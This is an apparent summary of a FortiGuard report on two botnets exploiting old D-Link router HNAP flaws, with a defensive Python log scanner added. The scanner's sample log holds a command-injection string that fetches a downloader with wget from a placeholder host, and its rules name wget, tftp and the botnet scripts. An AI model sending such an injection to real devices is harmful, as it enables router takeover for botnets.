Botnets Continue to Target Aging D-Link Vulnerabilities

In late 2024, FortiGuard Labs identified increased activity from two botnets, “FICORA,” a variant of Mirai, and “CAPSAICIN,” a Kaiten variant, exploiting vulnerabilities in D-Link routers. Affected devices include D-Link DIR-645, DIR-806, GO-RT-AC750, and DIR-845L models with outdated firmware. These vulnerabilities, particularly in the Home Network Administration Protocol (HNAP) interface, allow remote attackers to execute arbitrary commands on the device. They are tracked under several CVEs, including CVE-2015-2051 and CVE-2024-33112, all of which concern command execution through HNAP; the earliest was disclosed nearly a decade ago.

Both botnets employ methods to spread rapidly and execute malicious downloads on compromised systems. “FICORA” utilizes a downloader script named “multi,” which incorporates various downloading methods—like wget and tftp—to install the malware. The script also kills processes associated with previous malware, ensuring that “FICORA” remains the dominant threat on the network. It targets various Linux architectures, employing ChaCha20 encryption to protect its configuration and command-and-control (C2) server details.

In contrast, the “CAPSAICIN” botnet became notably active over a short period, targeting East Asian countries. Its downloader script “bins.sh” also aims for multiple Linux architectures and ensures its persistence by eliminating other known botnet processes upon installation. CAPSAICIN subsequently opens a connection to its C2 server, reporting the OS information of the infected host. Both botnets are characterized by their capabilities for distributed denial-of-service (DDoS) attacks, leveraging multiple protocols.
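As an added example (not code from the FortiGuard report or from the summary above), a small Python log scanner that flags the two indicators described here: HNAP requests whose SOAPAction header carries shell metacharacters, and retrieval of the downloader scripts “multi” and “bins.sh” via wget or tftp. The access-log layout, the placement of the SOAPAction header as the last quoted field, the `hnap.example` namespace and all IP addresses are constructed assumptions.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample lines (not from the FortiGuard report): an extended
# access-log format where the last quoted field is the SOAPAction header.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2024:10:01:02 +0000] "POST /HNAP1/ HTTP/1.1" 200 512 "http://hnap.example/HNAP1/GetDeviceSettings"
203.0.113.9 - - [12/Oct/2024:10:01:05 +0000] "POST /HNAP1/ HTTP/1.1" 500 0 "http://hnap.example/HNAP1/GetDeviceSettings/;wget http://198.51.100.5/multi"
192.0.2.44 - - [12/Oct/2024:10:01:06 +0000] "GET /bins.sh HTTP/1.1" 200 2048 "-"
198.51.100.2 - - [12/Oct/2024:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-"
"""

# Assumed log layout: client ip, ident, user, [timestamp], "request line",
# status, size, "SOAPAction header value" (or "-" when absent).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+) "(?P<soapaction>[^"]*)"$'
)

# Shell metacharacters that never belong in a legitimate HNAP SOAPAction URI.
SHELL_META_RE = re.compile(r'[;|`&]|\$\(')
# Download tools and downloader script names named in the report.
DOWNLOADER_RE = re.compile(r'\b(?:wget|tftp)\b|/(?:multi|bins\.sh)(?:\s|$)')


def classify(line: str) -> Optional[Tuple[str, str]]:
    """Return (source_ip, reason) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # unparsable line: not this scanner's job
    path, soap = m.group("path"), m.group("soapaction")
    # Rule 1: HNAP endpoint plus shell metacharacters in the SOAPAction header.
    if path.startswith("/HNAP1") and SHELL_META_RE.search(soap):
        return m.group("ip"), "hnap-command-injection"
    # Rule 2: download tool or known downloader script name in header or path.
    if DOWNLOADER_RE.search(soap) or DOWNLOADER_RE.search(path):
        return m.group("ip"), "botnet-downloader"
    return None


def scan_log(text: str) -> List[Tuple[str, str]]:
    """Run classify() over every line and keep only the hits, in log order."""
    return [hit for hit in (classify(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{reason}")
```

Hits are reported per source address so they can feed a block list or a ticket; in real traffic the HNAP rule alone is the higher-confidence signal, since a download keyword can appear in benign paths.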

Telemetry data from FortiGuard indicates that the infrastructure utilized by the “FICORA” botnet was centralized in the Netherlands, allowing for global targeting that wasn’t geographically specific. Meanwhile, CAPSAICIN’s attack activity was largely confined to a two-day window in October 2024.

Despite the existence of patches for the vulnerabilities exploited by both botnets, attacks remained prevalent because many organizations never applied the firmware updates that close these long-known holes. The vulnerabilities exploited are listed under various CVEs, and FortiGuard Labs has developed intrusion prevention signatures and antivirus detection mechanisms to combat these attacks. Organizations are encouraged to maintain updated firmware and utilize cybersecurity solutions, such as those provided by Fortinet, including FortiClient, FortiGate, and the FortiGuard AntiVirus engine.

Additionally, organizations are advised to engage in proactive training and awareness strategies for their staff regarding cybersecurity threats, especially those related to phishing attacks, to fortify defenses against such intrusions.

To summarize, the resurfacing of these botnets highlights the importance of regular device updates to mitigate vulnerabilities. Despite advances in cybersecurity measures, these legacy threats still pose significant risks, necessitating robust security practices and constant vigilance against potential exploits.

FortiGuard analytics allow for blocking of the C2 servers associated with these botnets, along with proactive measures against recognized malicious sources, emphasizing the need for a comprehensive security strategy that combines updated technology, threat intelligence sharing, and user education. If organizations suspect that they may have been impacted by these threats, reaching out to cybersecurity professionals for incident response is strongly recommended.
